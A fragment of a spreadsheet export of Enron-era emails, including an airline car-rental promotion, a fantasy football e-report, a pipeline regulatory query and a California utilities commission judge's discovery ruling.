26 a day in: West Palm Beach, FL (PBI)  $18 a day in: Raleigh-Durham, NC (R=_x000D_
DU)     To receive special Continental CO.O.L. discounted rates, simply mak=_x000D_
e advance reservations and be sure to request ID # 596871 and Rate Code 33.=_x000D_
 Book your reservation online at: www.alamo.com  or contact Alamo at 1-800 =_x000D_
GO ALAMO.  *If you are traveling to a city or a different date that is not =_x000D_
listed, Alamo offers great rates when you book online at: www.alamo.com    =_x000D_
For complete details on these offers, please refer to Alamo's terms and con=_x000D_
ditions  below.   return to top     CO.O.L. Travel Specials from National C=_x000D_
ar Rental   This week, National_x000D_
 offers great rates in the following cities. Rates  listed below are valid =_x000D_
on intermediate class cars at airport locations listed.  Other car types ma=_x000D_
y be available.  Rates are valid for rentals on Saturday,  May 12, 2001 wit=_x000D_
h returns Monday, May 14, 2001 or Tuesday,  May 15, 2001.  National logo   =_x000D_
 $23 a day in: Austin, TX (AUS)  $23 a day in: Cleveland, OH (CLE)  $29 a d=_x000D_
ay in: Hartford, CT (BDL)  $21 a day in: Nashville, TN (BNA)  $29 a day in:=_x000D_
 Boston, MA (BOS)  $30 a day in: Baton Rouge, LA (BTR)  $23 a day in: Dayto=_x000D_
n, OH (DAY)  $23 a day in: Grand Rapids, MI (GRR)  $21 a day in: Houston, T=_x000D_
X (IAH)  $26 a day in: Indianapolis, IN (IND)  $29 a day in: Jacksonville, =_x000D_
FL (JAX)  $54 a day in: Madison, WI (MSN)  $29 a day in: Newark, NJ (EWR)  =_x000D_
$29 a day in: New Orleans, LA (MSY)  $29 a day in: West Palm Beach, FL (PBI=_x000D_
)  $21 a day in: Raleigh-Durham, NC (RDU)  $23 a day in: Richmond, VA (RIC)=_x000D_
       To receive your special Continental Airlines CO.O.L. Travel Specials=_x000D_
 discounted rates, simply make your reservations in advance and be sure to =_x000D_
request Product Code COOLUS.  To make your reservation, contact National at=_x000D_
 1-800-CAR-RENT (1-800-227-7368), or book your reservation online at www.na=_x000D_
tionalcar.com .  Please enter COOLUS in the Product Rate Code field, and 50=_x000D_
37126 in the Contract ID field to ensure you get these rates on these dates=_x000D_
.  * If you are traveling to a city or a different date that is not listed,=_x000D_
 National offers great rates when you book online at: www.nationalcar.com  =_x000D_
 For complete details on these offers, please refer to National's terms and=_x000D_
 conditions  below.  return to top  Terms and Conditions  CO.O.L. Travel Sp=_x000D_
ecial Rules Fares include a $37.20 fuel surcharge. Passenger Facility Charg=_x000D_
es, up  to $12 depending on routing, are not included. Up to $2.75 per  seg=_x000D_
ment federal excise tax, as applicable, is not included. Applicable  Intern=_x000D_
ational and or Canadian taxes and fees up to $88, varying by  destination, =_x000D_
are not included and may vary slightly depending on currency exchange rate =_x000D_
at the time of purchase.   For a complete listing of rules please visit:  w=_x000D_
ww.continental.com    Alamo Rent A Car's Terms and Conditions:  www.alamo.c=_x000D_
om     National Car Rental Terms and Conditions: Customer must provide Cont=_x000D_
ract ID# at the time of reservation to be eligible for discounts. Offer val=_x000D_
id at participating National locations in the US and Canada. Minimum rental=_x000D_
 age is 25. This offer is not valid with any other special discount or prom=_x000D_
otion. Standard rental qualifications apply. Subject to availability and bl=_x000D_
ackout dates. Advance reservations required. Geographic driving restriction=_x000D_
s may apply.   Terms and Conditions for Westin, Sheraton, Four Points, St. =_x000D_
Regis, The Luxury Collection, and W Hotels: promo.starwood.com    return to=_x000D_
 top      This E-mail message and its contents are copyrighted and are prop=_x000D_
rietary products of Continental Airlines, Inc. Any unauthorized use, reprod=_x000D_
uction, or transfer of the message or its content, in any medium, is strict=_x000D_
ly prohibited.  Unfortunately, mail sent to this address cannot be answered=_x000D_
.  Please send all inquiries to: eservice@coair.com      [IMAGE] [IMAGE]  [=_x000D_
IMAGE]  [IMAGE] =09_x000D_
_x000D_
[IMAGE]</t>
  </si>
  <si>
    <t>Wed, 22 Nov 2000 04:29:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Commissioner.COM E-Reports for The Perfect League 11/22/00</t>
  </si>
  <si>
    <t xml:space="preserve">[IMAGE]_x000D_
_x000D_
_x000D_
Fantasy Basketball is here...and it's FREE! Join a league or create your own. _x000D_
It's a slam dunk!_x000D_
http://fantasybasketball.commissioner.com_x000D_
Run your Fantasy Basketball league for FREE with our fully-customizable _x000D_
league management service!_x000D_
http://basketball.commissioner.com_x000D_
_x000D_
The tab for SportsLine's FREE Fantasy Football is being picked up by Miller _x000D_
Lite, our favorite beer around here. Check them out offline at your local bar _x000D_
or online with us. Grab a Miller Lite. It's Miller Time!_x000D_
_x000D_
What does Carmen Electra have in common with Half.com? Nothing, but man is _x000D_
she HOT! Visit Half.com for HALF price on Music, Books, Movies &amp; Games!_x000D_
_x000D_
Gear up this NFL Season with the best selection of licensed apparel for all _x000D_
31 teams.  Visit the NFL Fan Shop at MVP.SportsLine.Com for all your _x000D_
needs...all season long!!_x000D_
_x000D_
_x000D_
_x000D_
Brought to you by_x000D_
_x000D_
_x000D_
_x000D_
Sponsorship Bar_x000D_
You are receiving these e-reports because you have signed up for CBS _x000D_
SportsLine Fantasy Football.  To customize, reschedule, or turn off these _x000D_
reports please  click here _x000D_
_x000D_
_x000D_
_x000D_
 Player Updates?NFL Reports? _x000D_
 Latest NFL Player News _x000D_
_x000D_
 Trent Green , QB STL - Murder Inc. Updated 11/22/00 _x000D_
 Green will get one more week as the team's starter.  He will start this _x000D_
Sunday vs. New Orleans, but Kurt Warner  is expected to return for the _x000D_
December 3rd game at Carolina.  This won't be the last you've heard from _x000D_
Green.  There has been talk that he will take his services elsewhere next _x000D_
year in hopes of obtaining a starting job.  For now look for Green to put up _x000D_
big numbers against the Saints defense this week.  New Orleans has a strong _x000D_
pass rush but their corners won't be able to contain the Rams' receivers long _x000D_
enough for them to pressure Green.    _x000D_
_x000D_
 Lions , DT DET - FDIC Updated 11/22/00 _x000D_
 Detroit had one of the top pass rushes in the NFL last year but are _x000D_
currently among the worst garnering a mere 22 sacks.   The Lions could be _x000D_
primed for a turnaround in the final games of the season.  Detroit's pass _x000D_
rush has been much improved since the resignation of head coach Bobby Ross.  _x000D_
Robert Porcher has played especially well in the last two games tallying five _x000D_
sacks and forcing a fumble.  Look for them to have a field day against the _x000D_
Patriots Sunday.  New England has allowed an astonishing 38 sacks this _x000D_
season.     _x000D_
_x000D_
 Mario Bates , RB DET - Free Agent Updated 11/22/00 _x000D_
 An MRI on Bates knee showed no structural damage and he is expected to play _x000D_
against the Patriots Thursday.  Bates has been a reliable third-down back for _x000D_
the Lions but hasn't provided much help for Fantasy teams this season.  Don't _x000D_
expect that to change when he faces the Patriots Thursday.     _x000D_
_x000D_
 James Stewart , RB DET - The Lie Downs Updated 11/22/00 _x000D_
 Stewart was able to practice Tuesday and will play in Thursday's game _x000D_
against the Patriots.  He suffered a hip-pointer injury Sunday that forced _x000D_
him to miss Monday's practice.  Don't be surprised if Stewart struggles _x000D_
against the Patriots.  If he isn't full strength he may have a hard time _x000D_
avoiding New England's linebackers.   _x000D_
_x000D_
 Marlon Barnes , RB CHI - Free Agent Updated 11/22/00 _x000D_
 Barnes gained 11 yards on three carries against the Buccaneers Sunday.  _x000D_
Starter James Allen will be back in the lineup once again this week after _x000D_
cutting his hand in last Sunday's game.  Barnes will resume his role as a _x000D_
third-down back.  He has played sparingly this season but could have a larger _x000D_
role in the offense next year.      _x000D_
_x000D_
 Eddie Kennison , WR CHI - Murder Inc. Updated 11/22/00 _x000D_
 Kennison has been a major disappointment as the Bears' second receiver this _x000D_
season catching just one touchdown pass through 11 games.  Things won't get _x000D_
any better this week when he faces a stingy Jets pass defense.  New York has _x000D_
only given up 11 passing TDs all season.  Kennison may get a few catches this _x000D_
week but don't expect him to score for your team.  At this point it would be _x000D_
wise to bench him if you haven't already.     _x000D_
_x000D_
 Paul Edinger , K CHI - Free Agent Updated 11/22/00 _x000D_
 Edinger has been on a roll lately making nine of his last ten field goals.  _x000D_
He could have another big week against the Jets this week.  The Bears _x000D_
shouldn't have any problems moving the chains -the Jets have given up a lot _x000D_
of yards this season but have managed to keep the opposition out of the end _x000D_
zone.  New York's defense has also seen opposing offenses attempt an _x000D_
NFL-leading 28 field goals.  If Edinger can remain accurate in the swirling _x000D_
New Jersey winds, he will have a big game.     _x000D_
_x000D_
 Bears , DT CHI - Free Agent Updated 11/22/00 _x000D_
 Look for the Bears secondary to contribute a few interceptions for your _x000D_
Fantasy team this week as Chicago faces the Jets and QB Vinny Testaverde this _x000D_
week.  Testaverde has thrown two or more interceptions in his last five _x000D_
games.  But if the Bears don't put any pressure on Testaverde and Curtis _x000D_
Martin they will rip the defense apart.  Chicago has a weak pass rush and an _x000D_
even softer run defense.    _x000D_
_x000D_
 Garrison Hearst , RB SF - Free Agent Updated 11/22/00 _x000D_
 Hearst has been added to the 49ers' active  roster.  Head coach Steve _x000D_
Mariucci says he probably won't get into a game this season, so it wouldn't _x000D_
be wise to pick Hearst up as a free agent.  He had spent the entire year on _x000D_
the physically-unable-to-perform list after missing all of last season while _x000D_
recovering from a career-threatening ankle injury.  Keep an eye on Hearst _x000D_
though.  If his condition continues to progress he could be a sleeper pick _x000D_
next year.    _x000D_
_x000D_
 Tony Horne , WR STL - Free Agent Updated 11/21/00 _x000D_
 Horne, one of the league's best kick returners, will be out for four to six _x000D_
weeks after breaking a bone in his right foot during Monday night's game _x000D_
against Washington. He had a 24.2-yard average on kickoff returns, including _x000D_
a 103-yard touchdown. The Rams may use Az-Zahir Hakim, their punt returner, _x000D_
on kickoffs, but are more likely to sign someone.  _x000D_
_x000D_
 Charles Kirby , RB TB - Free Agent Updated 11/21/00 _x000D_
 With Mike Alstott now out for at least the remainder of the regular season, _x000D_
Kirby is the only remaining true fullback on the Buccaneers' roster. Still, _x000D_
he was promoted from the practice squad just two weeks ago merely to serve as _x000D_
a blocker in short-yardage situations, so don't expect him to come close to _x000D_
the 12 carries per game Alstott was averaging. Warrick Dunn will be the _x000D_
primary focus of the running game.  _x000D_
_x000D_
 Marshall Faulk , RB STL - FDIC Updated 11/21/00 _x000D_
 Faulk made an impressive return from arthroscopic surgery on his right knee _x000D_
last night against Washington, making nine catches for 88 yards and a _x000D_
touchdown while rushing for 33 yards on nine carries. He had the surgery just _x000D_
14 days prior, so the Rams were light on his rushing load, but Faulk looked _x000D_
solid in his first game back. Expect him to be close to full strength when _x000D_
the Rams play New Orleans on Sunday.  _x000D_
_x000D_
 Will Blackwell , WR PIT - Free Agent Updated 11/21/00 _x000D_
 The Steelers have activated Blackwell from the physically unable to perform _x000D_
list and placed him on their 53-man roster. He was placed on that list July _x000D_
16 after suffering a May knee injury, and is an unrestricted free agent after _x000D_
the season. Still, don't count on much, if any, Fantasy value from Blackwell. _x000D_
 _x000D_
_x000D_
 Mario Bates , RB DET - Free Agent Updated 11/21/00 _x000D_
 The Lions are awaiting results of an MRI performed on Bates' injured knee, _x000D_
which he sustained during Sunday's game against the Giants. He is less likely _x000D_
to play Thursday against New England than first-stringer James Stewart.  _x000D_
_x000D_
 James Stewart , RB DET - The Lie Downs Updated 11/21/00 _x000D_
 Stewart was unable to practice with the team yesterday after suffering a hip _x000D_
pointer in Sunday's game against the Giants. With the Lions' next game coming _x000D_
Thursday against New England, there isn't much time for him to heal. Coach _x000D_
Gary Moeller thinks Stewart will be able to play through the injury. His _x000D_
status is more critical with backup Mario Bates also ailing. If neither can _x000D_
go, fullback Cory Schlesinger, running back Sedrick Irvin and special teams _x000D_
member Brock Olivo would fill in.  _x000D_
_x000D_
 Scott Mitchell , QB CIN - Free Agent Updated 11/21/00 _x000D_
 Despite a sprained left knee that required a brace and had him limping _x000D_
yesterday, Mitchell is still hopeful he can play Sunday against Pittsburgh. _x000D_
He is listed on the injury report as doubtful after suffering a sprained MCL _x000D_
during last Sunday's game against New England, but an MRI performed yesterday _x000D_
revealed no damage. If Mitchell can play, he will get the start. He'll very _x000D_
likely play if it's physically possible.  _x000D_
_x000D_
 James Allen , RB CHI - FDIC Updated 11/21/00 _x000D_
 The Chicago Sun-Times reports that Allen will not miss practice this week _x000D_
after suffering a cut on his right hand during Sunday's game against Tampa _x000D_
Bay. He should be ready to play next Sunday against the Jets.  _x000D_
_x000D_
 Cade McNown , QB CHI - Free Agent Updated 11/21/00 _x000D_
 With Shane Matthews performing well as the starter, the Bears can afford to _x000D_
be patient with McNown as he recovers from a separated left shoulder. He _x000D_
threw 15-yard passes with Matthews before Sunday's game against Tampa Bay and _x000D_
will participate in some drills tomorrow. McNown could serve as the third _x000D_
quarterback next Sunday against the Jets.   _x000D_
_x000D_
 Chris Chandler , QB ATL - Murder Inc. Updated 11/21/00 _x000D_
 Chandler might lose some playing time over the season's final weeks, as the _x000D_
Falcons try to evaluate rookie Doug Johnson for their future. This isn't a _x000D_
condemnation of the veteran Chandler, but his owners should make sure he's _x000D_
going to start each week before giving him the nod.  _x000D_
_x000D_
 Doug Johnson , QB ATL - Free Agent Updated 11/21/00 _x000D_
 The Falcons might consider giving Johnson some playing time over the _x000D_
season's final weeks, as the team decides whether he can serve as the QB of _x000D_
the future or if one will need to be taken in next year's draft. If he is _x000D_
given a shot, those in keeper leagues should keep a close eye on his _x000D_
performance.  _x000D_
_x000D_
 Obafemi Ayanbadejo , RB BAL - Thrill Kill Cult Updated 11/21/00 _x000D_
 Ayanbadejo will likely be inactive for Sunday's game against Cleveland. With _x000D_
Baltimore's bye week coming up after that, he will get an extra week to rest, _x000D_
and should be ready to roll against San Diego in Week 15.  _x000D_
_x000D_
 Donovan McNabb , QB PHI - Meximullets Updated 11/21/00 _x000D_
 The Eagles' signal caller is really maturing right before our eyes.  He _x000D_
completed 25-of-34 passes for 217 yards and accounted for two touchdowns in _x000D_
Sunday's win over Arizona.  He will need to keep his composure next week _x000D_
against the Redskins, as the two teams battle for first place in the NFC _x000D_
East.  The Eagles will need a huge performance from McNabb if they are to _x000D_
beat Washington, so give him a start this week in the big game.    _x000D_
_x000D_
 Albert Connell , WR WAS - FDIC Updated 11/21/00 _x000D_
 Connell caught five passes for 96 yards in Monday night's win over the _x000D_
Rams.  Washington will face a tough Eagles' secondary next week, which will _x000D_
be looking to keep their team in first place in the NFC East.  If the 'Skins _x000D_
can establish their running game early, Connell could have a big game.      _x000D_
_x000D_
 Jeff George , QB WAS - The Snake Pit Updated 11/21/00 _x000D_
 George was very impressive in Monday night's big win over St. Louis.  He _x000D_
completed 24-of-34 passes for 269 yards and three touchdowns against the _x000D_
Rams, further clouding the quarterback situation in Washington.  Starter Brad _x000D_
Johnson should know by Thursday if he is able to play next week against the  _x000D_
Eagles, so keep tabs on his progress in the coming days if you have either of _x000D_
these players on your roster.    _x000D_
_x000D_
 Stephen Davis , RB WAS - Meximullets Updated 11/21/00 _x000D_
 Davis accounted for 106 yards of total offense but didn't score a touchdown _x000D_
as Washington defeated St. Louis 33-20 on Monday night. It was the first time _x000D_
in seven weeks that Davis had been held out of the end zone. Look for the _x000D_
'Skins to establish Davis early in the game next week against the Eagles in _x000D_
an effort to open up their passing game.     _x000D_
_x000D_
 Jon Kitna , QB SEA - Ramiro Updated 11/21/00 _x000D_
 Head Coach Mike Holmgren has named Brock Huard the starter for this week's _x000D_
game against the Broncos, relegating Kitna to the Seattle bench.  Kitna was _x000D_
named the AFC's Player of the Week two weeks ago, but it obviously wasn't _x000D_
enough to keep the starting job.    _x000D_
_x000D_
 Elvis Grbac , QB KC - Ramiro Updated 11/21/00 _x000D_
 Grbac injured the index finger on his throwing hand against the Bills, but _x000D_
the injury won't likely keep him from playing this week against the _x000D_
Chargers.  "We'll see Wednesday or Thursday," said Head Coach Gunther _x000D_
Cunningham, "but from what the doctors told me, I think the opportunity's _x000D_
there for him to play."    _x000D_
_x000D_
 Broncos , DT DEN - The Rounders Updated 11/21/00 _x000D_
 Cornerback Ray Crockett will miss at least four games with a torn _x000D_
hamstring.  The injury occurred on the final play of the third quarter while _x000D_
Crockett was chasing down Chargers' wideout Jeff Graham.  Nine-year veteran _x000D_
Jimmy Spencer will take over Crockett's position until he returns.    _x000D_
_x000D_
 Akili Smith , QB CIN - Free Agent Updated 11/21/00 _x000D_
 Smith looks likely to get the start when the Bengals play Pittsburgh next _x000D_
Sunday. Scott Mitchell, who started Sunday's game against New England, is _x000D_
listed as doubtful with a sprained left knee he suffered in that game. Just _x000D_
because Smith is starting doesn't mean you should do the same - he needs to _x000D_
get in gear before he'll have any Fantasy value.  _x000D_
_x000D_
 Terrell Davis , RB DEN - Thrill Kill Cult Updated 11/21/00 _x000D_
 Davis will undergo another MRI this week on his injured leg and is having an _x000D_
expert in San Francisco cross-check the results.  At this point, the Broncos _x000D_
are preparing for this week's game against Seattle as if Davis were _x000D_
unavailable.  If you have Davis' backup, Mike Anderson, it seems like a good _x000D_
idea to include him in your starting lineup this week.     _x000D_
_x000D_
More Updates _x000D_
_x000D_
 Rosters?Teams? _x000D_
_x000D_
_x000D_
 [IMAGE]_x000D_
[IMAGE]_x000D_
 Meximullets _x000D_
 Eric Bass _x000D_
_x000D_
_x000D_
_x000D_
  Player  _x000D_
  TM  _x000D_
  Pos  _x000D_
  Status  _x000D_
  Next  _x000D_
  Bye  _x000D_
  McNabb, Donovan  _x000D_
 PHI _x000D_
 QB _x000D_
 Active _x000D_
 @WAS _x000D_
  Week 16  _x000D_
 Davis, Stephen  _x000D_
 WAS _x000D_
 RB _x000D_
 Active _x000D_
 PHI _x000D_
  Week 11  _x000D_
 Autry, Darnell  _x000D_
 PHI _x000D_
 RB _x000D_
 Active _x000D_
 @WAS _x000D_
  Week 16  _x000D_
 Freeman, Antonio  _x000D_
 GB _x000D_
 WR _x000D_
 Active _x000D_
 @CAR _x000D_
  Week 8  _x000D_
 Toomer, Amani  _x000D_
 NYG _x000D_
 WR _x000D_
 Active _x000D_
 @ARI _x000D_
  Week 8  _x000D_
 Holt, Torry  _x000D_
 STL _x000D_
 WR _x000D_
 Active _x000D_
 NO _x000D_
  Week 6  _x000D_
 Brady, Kyle  _x000D_
 JAC _x000D_
 TE _x000D_
 Active _x000D_
 TEN _x000D_
  Week 10  _x000D_
 Anderson, Gary  _x000D_
 MIN _x000D_
 K _x000D_
 Active _x000D_
 @DAL _x000D_
  Week 4  _x000D_
 Ravens  _x000D_
 BAL _x000D_
 DT _x000D_
 Active _x000D_
 CLE _x000D_
  Week 14  _x000D_
 Garcia, Jeff  _x000D_
 SF _x000D_
 QB _x000D_
 Reserve _x000D_
 bye _x000D_
  Week 13  _x000D_
 Bryson, Shawn  _x000D_
 BUF _x000D_
 RB _x000D_
 Reserve _x000D_
 @TB _x000D_
  Week 4  _x000D_
 Garner, Charlie  _x000D_
 SF _x000D_
 RB _x000D_
 Reserve _x000D_
 bye _x000D_
  Week 13  _x000D_
 Hicks, Skip  _x000D_
 WAS _x000D_
 RB _x000D_
 Reserve _x000D_
 PHI _x000D_
  Week 11  _x000D_
 Watson, Justin  _x000D_
 STL _x000D_
 RB _x000D_
 Reserve _x000D_
 NO _x000D_
  Week 6  _x000D_
 Schroeder, Bill  _x000D_
 GB _x000D_
 WR _x000D_
 Reserve _x000D_
 @CAR _x000D_
  Week 8  _x000D_
 Robinson, Marcus  _x000D_
 CHI _x000D_
 WR _x000D_
 Reserve _x000D_
 @NYJ _x000D_
  Week 9  _x000D_
 Wilkins, Jeff  _x000D_
 STL _x000D_
 K _x000D_
 Reserve _x000D_
 NO _x000D_
  Week 6  _x000D_
_x000D_
Total Active Players: 9_x000D_
Total Reserve Players: 8_x000D_
_x000D_
  NFL Injuries for Meximullets  _x000D_
_x000D_
  Updated  _x000D_
  Player  _x000D_
  Team  _x000D_
  Pos  _x000D_
  Injury  _x000D_
  Expected Return  _x000D_
 11/16/00 _x000D_
  Wilkins, Jeff  _x000D_
 STL _x000D_
 K _x000D_
 Quadriceps _x000D_
 Won't play in Monday's game vs. Was.  _x000D_
_x000D_
_x000D_
 View?Transactions? _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
[IMAGE]?  Make Selection  _x000D_
? [IMAGE]_x000D_
_x000D_
_x000D_
_x000D_
 _x000D_
_x000D_
_x000D_
[IMAGE]_x000D_
 There are no League Transactions which meet the selected criteria._x000D_
_x000D_
To see all league transactions select "All", "All", "All Teams" from the _x000D_
Transactions, View page. _x000D_
 _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Copyright 2000 Commissioner.COM Inc and SportsLine.com Inc._x000D_
Your site is always at http://football.commissioner.com/kourn_x000D_
_x000D_
FB10SP_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 24 Aug 2000 02:56:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Caithness Big Sandy, LLC. Project</t>
  </si>
  <si>
    <t xml:space="preserve">I owe Michele a call because she has a couple of questions.  Will do after I _x000D_
finish options draft.  _x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Drew Fossum                           08/24/2000 09:54 AM_x000D_
	_x000D_
_x000D_
To: Susan Scott/ET&amp;S/Enron@ENRON, Maria Pavlou/ET&amp;S/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re: Caithness Big Sandy, LLC. Project_x000D_
_x000D_
Have you guys met/discussed this with Michele?  Please get me up to speed.  _x000D_
Thanks DF  _x000D_
---------------------- Forwarded by Drew Fossum/ET&amp;S/Enron on 08/24/2000 _x000D_
09:54 AM ---------------------------_x000D_
   Michele Winckowski                08/17/2000 01:39 PM_x000D_
_x000D_
To: Drew Fossum/ET&amp;S/Enron@ENRON, Mary Kay Miller/ET&amp;S/Enron@Enron, Maria _x000D_
Pavlou/ET&amp;S/Enron@ENRON, Dari Dornan/ET&amp;S/Enron@Enron, Glen _x000D_
Hass/ET&amp;S/Enron@Enron_x000D_
cc: Keith Petersen/ET&amp;S/Enron@ENRON, Jeffery Fawcett/ET&amp;S/Enron@ENRON, Susan _x000D_
Scott/ET&amp;S/Enron@ENRON _x000D_
_x000D_
Subject: Re: Caithness Big Sandy, LLC. Project  _x000D_
_x000D_
As you are aware, Transwestern is working with a shipper to potentially _x000D_
provide service to a new power plant located approximately 40 miles off the _x000D_
mainline in Arizona.  Although, the final negotiation are not complete _x000D_
certain options are being evaluated, I need some assistance in interpreting _x000D_
the regulations regarding the authority we should use for approval of this _x000D_
project.  _x000D_
_x000D_
The facilities that would be constructed include a delivery point and _x000D_
approximately 40 miles of pipe.  As these facilities are non-mainline, it may _x000D_
be possible to construct the proposed facilities under the prior notice _x000D_
provisions of TW's blanket certificate, provided the project satisfies the _x000D_
blanket criteria (generally costs and environmental)._x000D_
_x000D_
With this in mind, I have the following issues and questions:_x000D_
_x000D_
Preliminarily, marketing is thinking that we may want to develop an _x000D_
incremental rate  to recover the cost of the project._x000D_
_x000D_
Would a new incremental rate for this service impact our ability to file for _x000D_
approval under the prior notice provisions?  Note: Generally, Subpart F of _x000D_
Part 157 (blanket regulations) does not address service issues as _x000D_
transportation service is provided under Part 284 of the Commission's _x000D_
regulations.  However, the regulations (o157.204)  set forth Who may apply _x000D_
for a blanket certificate.   The criteria includes, among other things, any _x000D_
interstate pipeline that has rates accepted by the Commission.  Therefore, _x000D_
would an incremental rate have to be approved by the Commission before the _x000D_
proposed facilities would be blanket eligible?_x000D_
_x000D_
Can a new incremental rate be established through a limit-section 4 rate _x000D_
filing or is a case-specific certificate required?_x000D_
_x000D_
As the facilities will not include any mainline expansion - Is an open season _x000D_
required for the project?  My opinion is "NO".  Do you agree?_x000D_
_x000D_
Your thoughts and assistance in this matter would be greatly appreciated.  _x000D_
Thanks MW_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 2 Mar 2001 04:00:00 -0800 (PST)</t>
  </si>
  <si>
    <t>http://www.austin360.com/sports/hookem/stories/2000/03/0201pittman.html</t>
  </si>
  <si>
    <t>Thu, 28 Feb 2002 06:15:39 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({"'jewell@enron.com", 'cjewell@bcm.tmc.edu'})</t>
  </si>
  <si>
    <t>What is an Ambassador Doll and where can I buy one?_x000D_
_x000D_
-----Original Message-----_x000D_
From: Jewell, Cyndi M [mailto:cjewell@bcm.tmc.edu]_x000D_
Sent: Thursday, February 28, 2002 8:06 AM_x000D_
To: Shelley A. Corman (E-mail)_x000D_
Subject: _x000D_
_x000D_
_x000D_
Thanks so much for lunch yesterday!_x000D_
_x000D_
I looked up Nancy Kline's info. She is a nurse practitioner who also has a_x000D_
Ph.D. -- a real underachiever._x000D_
_x000D_
I'm actually working with Mark Kline on their idea for an Ambassador Doll._x000D_
We are trademarking it. _x000D_
_x000D_
Have a good day._x000D_
_x000D_
CB</t>
  </si>
  <si>
    <t>Mon, 22 May 2000 03:30:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'alb@cpuc.ca.gov'})</t>
  </si>
  <si>
    <t>frozenset({'andy.bettwy@swgas.com', 'sscott3@enron.com', 'tah@cpuc.ca.gov', 'rczahar@aol.com', 'garyb@abag.ca.gov', 'eklinkner@ci.pasadena.ca.us', 'napedersen@jonesday.com', 'burkee@cts.com', 'salleyoo@dwt.com', 'jwr@cpuc.ca.gov', 'raw@cpuc.ca.gov', 'askaff@energy-law-group.com', 'jkarp@whitecase.com', 'slins@ci.glendale.ca.us', 'aod@newsdata.com', 'ceyap@earthlink.net', 'rochmanm@spurr.org', 'jweil@aglet.org', 'hayley@turn.org', 'bjeider@ci.burbank.ca.us', 'davef@abag.ca.gov', 'raveen_maan@cerberus.city.palo-alto.ca.us', 'gtbl@dynegy.com', 'mjaske@energy.state.ca.us', 'kfyip@seiworldwide.com', 'sbs@cpuc.ca.gov', 'jsteffen@iid.com', 'jmct@gmssr.com', 'vjb@cpuc.ca.gov', 'rick.counihan@greenmountain.com', 'rbw@mrwassoc.com', 'mark.c.moench@wgp.twc.com', 'evk1@pge.com', 'rochmanm@cubjpa.org', 'jmpa@dynegy.com', 'bcragg@gmssr.com', 'johnj@bcjlaw.com', 'furutanj@efawest.navfac.navy.mil', 'ron_oechsler@rmiinc.com', 'kmccrea@sablaw.com', 'rpelote@energy.twc.com', 'plg@cpuc.ca.gov', 'alan_reid@pcp.ca', 'rmp@cpuc.ca.gov', 'gbudin@energy.state.ca.us', 'mdjoseph@adamsbroadwell.com', 'chilen@llgm.com', 'joseh@lif.org', 'lindseyhowdowning@dwt.com', 'bwood@energy.state.ca.us', 'lmh@eslawfirm.com', 'rgloistein@orrick.com', 'jcattermole@pcenergy.com', 'ram@cpuc.ca.gov', 'iep@iepa.com', 'mday@gmssr.com', 'bho@cpuc.ca.gov', 'edf@cpuc.ca.gov', 'eke@aelaw.com', 'chris.king@utility.com', 'ghinners@reliantenergy.com', 'stomashe@energy.state.ca.us', 'mcn@cpuc.ca.gov', 'marcel@turn.org', 'epoole@adplaw.com', 'tdickers@westerngas.com', 'inggm@sce.com', 'igsinc@ix.netcom.com', 'alb@cpuc.ca.gov', 'ewo@jmbm.com', 'pjpowerlaw@aol.com', 'tom.roth@et.pge.com', 'karen@klindh.com', 'dcarroll@dbsr.com', 'ronknecht@aol.com', 'craigc@calpine.com', 'ed@clfp.com', 'eyq@cpuc.ca.gov', 'grant_kolling@cerberus.city.palo-alto.ca.us', 'rpetti@ladwp.com', 'jleslie@luce.com', 'skatz@sempratrading.com', 'karpjos@sf.whitecase.com', 'gsullivan@sempra.com', 'kmills@cfbf.com', 'ltt@cpuc.ca.gov'})</t>
  </si>
  <si>
    <t>RE: I.99-07-003</t>
  </si>
  <si>
    <t xml:space="preserve">I have now received SCGC's Motion to Compel.? I note that the same _x000D_
interrogatories that TURN withdrew, SCGC is withdrawing.? Therefore, my _x000D_
original view that we can deal with this without taking up time at the PHC _x000D_
still stands.? I would like you to try to work this out by yourselves based _x000D_
upon my indication here as to how I will rule. _x000D_
_x000D_
The bottom line is that SoCalGas must respond to those interrogatories _x000D_
seeking to clarify which settlement is its first choice.? It is by no means _x000D_
crystal clear, and does impact the breadth of support for each settlement.? _x000D_
(In fact, I'd like to know SDG&amp;E's view on this too.)? I think this could be _x000D_
done in a limited way as opposed to responses to all the interrogatories _x000D_
comparing the two settlements.? Whether SoCalGas has breached the Interim _x000D_
Settlement by also signing the Comprehensive Settlement is not directly _x000D_
relevant to this proceeding.? I don't need to determine that and I don't want _x000D_
to expand this already far-ranging proceeding to include that - take it to _x000D_
court if you want to.? Moreover, some of the questions are now moot as all _x000D_
prepared testimony has been lodged.? So, please meet and confer again.? If _x000D_
you can't come to an agreement based on my views in this email, then SoCalGas _x000D_
should file its Opposition on the 23rd, and I'll rule on each interrogatory _x000D_
on the 25th.? Please let me know ASAP if you've worked something out.? _x000D_
_x000D_
--Judge Biren _x000D_
_x000D_
-----Original Message----- _x000D_
From: Sullivan, Glen J. [mailto:GSullivan@sempra.com] _x000D_
Sent: Wednesday, May 17, 2000 12:11 PM _x000D_
To: 'Hayley Goodson'; alan_reid@pcp.ca; alb@cpuc.ca.gov; _x000D_
andy.bettwy@swgas.com; aod@newsdata.com; askaff@energy-law-group.com; _x000D_
bcragg@gmssr.com; bho@cpuc.ca.gov; bjeider@ci.burbank.ca.us; _x000D_
burkee@cts.com; bwood@energy.state.ca.us; ceyap@earthlink.net; _x000D_
chilen@llgm.com; chris.king@utility.com; craigc@calpine.com; _x000D_
davef@abag.ca.gov; dcarroll@dbsr.com; ed@clfp.com; edf@cpuc.ca.gov; _x000D_
eke@aelaw.com; eklinkner@ci.pasadena.ca.us; epoole@adplaw.com; _x000D_
evk1@pge.com; ewo@jmbm.com; eyq@cpuc.ca.gov; _x000D_
furutanj@efawest.navfac.navy.mil; garyb@abag.ca.gov; _x000D_
gbudin@energy.state.ca.us; ghinners@reliantenergy.com; _x000D_
